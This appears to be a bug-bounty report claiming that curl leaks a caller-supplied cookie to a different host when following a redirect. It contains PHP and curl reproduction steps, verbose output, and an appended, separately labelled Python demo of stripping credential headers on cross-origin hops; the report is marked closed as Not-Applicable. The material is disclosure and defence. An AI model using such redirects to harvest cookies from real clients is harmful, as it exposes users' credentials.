cookie is sent on redirect

Medium
curl
Reported by iylz

Vulnerability Details

Technical details and impact analysis

Insufficiently Protected Credentials
## Summary:

Curl can be coaxed to leak user credentials to a third-party host by issuing an HTTP redirect.

## Steps To Reproduce:

1. Create a 302.php file, such as:

```
<?php header("Location: http://a.com:8000"); ?>
```

Add the 2 records in the /etc/hosts file:

```
127.0.0.1 a.com
127.0.0.1 b.com
```

2. curl -vv --cookie 'aaa=2222' http://b.com/302a.php -L

The redirect will be followed, and the confidential Cookie header will be sent to a.com:

```
# ./curl -V
curl 8.6.0 (x86_64-pc-linux-gnu) libcurl/8.6.0 OpenSSL/1.0.2k-fips zlib/1.2.7
Release-Date: 2024-01-31
Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp
Features: alt-svc AsynchDNS HSTS HTTPS-proxy IPv6 Largefile libz NTLM SSL threadsafe UnixSockets
# curl -vv --cookie 'aaa=2222' http://b.com/302a.php -L
* About to connect() to b.com port 80 (#0)
*   Trying 127.0.0.1...
* Connected to b.com (127.0.0.1) port 80 (#0)
> GET /302a.php HTTP/1.1
> User-Agent: curl/7.29.0
> Host: b.com
> Accept: */*
> Cookie: aaa=2222
>
< HTTP/1.1 302 Found
< Date: Fri, 02 Feb 2024 08:49:12 GMT
< Server: Apache/2.4.6 (CentOS) PHP/5.4.16
< X-Powered-By: PHP/5.4.16
< Location: http://a.com:8000
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host b.com left intact
* Issue another request to this URL: 'http://a.com:8000'
* About to connect() to a.com port 8000 (#1)
*   Trying 127.0.0.1...
* Connected to a.com (127.0.0.1) port 8000 (#1)
> GET / HTTP/1.1
> User-Agent: curl/7.29.0
> Host: a.com:8000
> Accept: */*
> Cookie: aaa=2222
```

This does not comply with RFC regulations and is inconsistent with browser behavior, and the RFC also states that redirection requires deleting cookies.

https://www.ietf.org/rfc/rfc9110.txt

```
3. Consider removing header fields that were not automatically generated by the implementation (i.e., those present in the request because they were added by the calling context) where there are security implications; this includes but is not limited to Authorization and Cookie.
```

## Supporting Material/References:

* https://www.ietf.org/rfc/rfc9110.txt

## Impact

Leak of confidential information (user credentials).
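The scenario above, reproduced locally with a client that applies the RFC 9110 section 15.4 advice the report quotes. This is an added example and is not curl's code, nor part of the report: `headers_for_redirect` drops caller-supplied Cookie and Authorization headers only when a redirect leaves the current origin (scheme, host, port), so a.com:8000 and b.com:80 count as different origins. The two threaded `http.server` instances stand in for b.com/302a.php and a.com:8000; the loopback addresses, ports, and the `strip_cross_origin` switch are assumptions made for the demo, and the quoted RFC text is advisory ("Consider removing"), so the switch shows both behaviours side by side.

```python
"""Added example (not curl's code, not part of the report): a redirect-following
client that strips credential headers on a cross-origin hop, per RFC 9110 s15.4.
The two servers below are constructed stand-ins for b.com and a.com:8000."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Headers added by the calling context that carry credentials; RFC 9110 s15.4
# names these two explicitly (add Proxy-Authorization etc. if you need it).
CREDENTIAL_HEADERS = {"cookie", "authorization"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """(scheme, host, port) with the default port filled in, as browsers compare."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or DEFAULT_PORTS.get(p.scheme))


def headers_for_redirect(current_url, next_url, headers):
    """Headers to carry to next_url: unchanged for a same-origin hop, credential
    headers removed for a cross-origin hop (a.com:8000 vs b.com:80 in the report)."""
    if origin(current_url) == origin(next_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in CREDENTIAL_HEADERS}


def fetch(url, headers, strip_cross_origin=True, max_redirects=5):
    """Follow redirects like curl -L; returns (final_url, headers sent there, status)."""
    sent = dict(headers)
    for _ in range(max_redirects + 1):
        p = urlsplit(url)
        conn = http.client.HTTPConnection(p.hostname, p.port or 80, timeout=5)
        try:
            conn.request("GET", p.path or "/", headers=sent)
            resp = conn.getresponse()
            resp.read()
            location = resp.getheader("Location")
            if resp.status in (301, 302, 303, 307, 308) and location:
                # Location is absolute in this demo; a real client resolves it
                # against url before comparing origins.
                if strip_cross_origin:
                    sent = headers_for_redirect(url, location, sent)
                url = location
                continue
            return url, sent, resp.status
        finally:
            conn.close()
    raise RuntimeError("too many redirects")


received = {}  # request headers the target server saw most recently


class Redirector(BaseHTTPRequestHandler):
    """Plays b.com/302a.php: answers every GET with a 302 to Redirector.target."""
    target = None

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", self.target)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


class Target(BaseHTTPRequestHandler):
    """Plays a.com:8000: records the request headers it receives."""

    def do_GET(self):
        received.clear()
        received.update({k.lower(): v for k, v in self.headers.items()})
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):
        pass


def serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)  # port 0: any free loopback port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo(strip_cross_origin):
    """Run the report's scenario locally; returns (status, cookie_reached_target)."""
    target = serve(Target)
    Redirector.target = f"http://127.0.0.1:{target.server_port}/"
    redirector = serve(Redirector)
    try:
        _, _, status = fetch(f"http://127.0.0.1:{redirector.server_port}/302a.php",
                             {"Cookie": "aaa=2222"}, strip_cross_origin)
    finally:
        for s in (target, redirector):
            s.shutdown()
            s.server_close()
    return status, "cookie" in received


if __name__ == "__main__":
    print("curl -L behaviour from the report:", demo(strip_cross_origin=False))
    print("RFC 9110 s15.4 behaviour:         ", demo(strip_cross_origin=True))
```

The origin check is deliberately stricter than a hostname comparison: the report's hop changes both host and port, but a hop from b.com:80 to b.com:8000 would also be cross-origin and is handled the same way.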

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Weakness

Insufficiently Protected Credentials